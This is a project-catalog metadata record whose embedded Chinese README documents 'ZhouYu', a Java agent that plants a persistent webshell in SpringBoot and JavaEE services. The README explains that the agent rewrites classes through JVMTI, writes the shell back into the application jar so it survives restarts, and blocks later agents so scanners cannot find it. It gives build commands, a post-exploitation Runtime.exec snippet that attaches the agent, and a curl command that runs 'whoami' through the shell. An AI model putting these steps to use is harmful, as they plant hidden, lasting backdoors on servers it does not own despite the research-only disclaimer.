{"id":13843346,"url":"https://github.com/threedr3am/ZhouYu","last_synced_at":"2025-07-11T18:31:44.921Z","repository":{"id":45011178,"uuid":"352593180","full_name":"threedr3am/ZhouYu","owner":"threedr3am","description":"（周瑜）Java - SpringBoot 持久化 WebShell 学习demo（不仅仅是SpringBoot，适合任何符合JavaEE规范的服务）","archived":false,"fork":false,"pushed_at":"2021-12-29T06:12:34.000Z","size":41,"stargazers_count":579,"open_issues_count":2,"forks_count":64,"subscribers_count":11,"default_branch":"main","last_synced_at":"2024-08-05T17:37:06.500Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/threedr3am.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-03-29T09:50:33.000Z","updated_at":"2024-08-01T08:55:50.000Z","dependencies_parsed_at":"2022-08-12T11:40:45.691Z","dependency_job_id":null,"html_url":"https://github.com/threedr3am/ZhouYu","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/threedr3am","download_url":"https://codeload.github.com/threedr3am/ZhouYu/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745588,"owners_count":17517674,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:00.167Z","updated_at":"2024-11-21T14:31:05.386Z","avatar_url":"https://github.com/threedr3am.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"*工具仅用于安全研究，禁止使用工具发起非法攻击，造成的后果使用者负责*\n\n### ZhouYu -\u003e 周瑜\n\nJava - SpringBoot 持久化 WebShell（适配任何符合JavaEE规范的服务）\n\n背景：后Spring时代，SpringBoot jar部署模式下，一般没有了JSP，所有的模板都在jar内，当大家都热衷于内存马的时候，发现很容易被查杀（网上查杀方式无外乎都是利用JVMTI重加载class的javaagent方式），并且重启后丢失！\n\n1. ZhouYu带来新的webshell写入手法，通过javaagent，利用JVMTI机制，在回调时重写class类，插入webshell，并通过阻止后续javaagent加载的方式，防止webshell被查杀\n\n2. 修改的class类插入webshell后，通过持久化到jar进行class替换，达到webshell持久化，任你如何重启都无法甩掉\n\n### 一、打包编译\n\n命令：\n```text\ngradle :agent:shadowJar\n```\n或\n```text\n./gradlew :agent:shadowJar\n```\n\n编译后得到 agent/build/libs/agent-1.0-SNAPSHOT-all.jar，即ZhouYu.jar\n\n### 二、使用方式\n\n两种场景：\n\n1. 当你知道jvm pid时，并且能写入临时文件（ZhouYu.jar），一般这种场景不太常见，测试场景比较多\n```text\njava -jar ZhouYu.jar 23232，23232为需要attach的jvm进程号！\n```\n\n2. 能执行一小段代码（内存shell的原理一般是反序列化时加载一段恶意字节码）\n\n先把编译后得到的ZhouYu.jar写到临时目录，例：/tmp/ZhouYu.jar\n\n接着执行下面代码：\n```\ntry {\n  String pid = java.lang.management.ManagementFactory.getRuntimeMXBean().getName();\n  int indexOf = pid.indexOf('@');\n  if (indexOf \u003e 0) {\n    pid = pid.substring(0, indexOf);\n    Runtime.getRuntime().exec(String.format(\"java -jar /tmp/ZhouYu.jar %s\", pid));\n  }\n} catch (Throwable throwable) {\n\n}\n```\n\n3. 执行命令\n```\ncurl -XGET \"http://127.0.0.1:8080?cmd=whoami\"\n```\n\n### WARNNING\n\n#### 为了防止出现生产事故，在对原有jar（A.jar）进行替换修改前，会对其进行备份，备份到当前目录下（命名为.A.jar.bk）","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthreedr3am%2FZhouYu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthreedr3am%2FZhouYu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthreedr3am%2FZhouYu/lists"}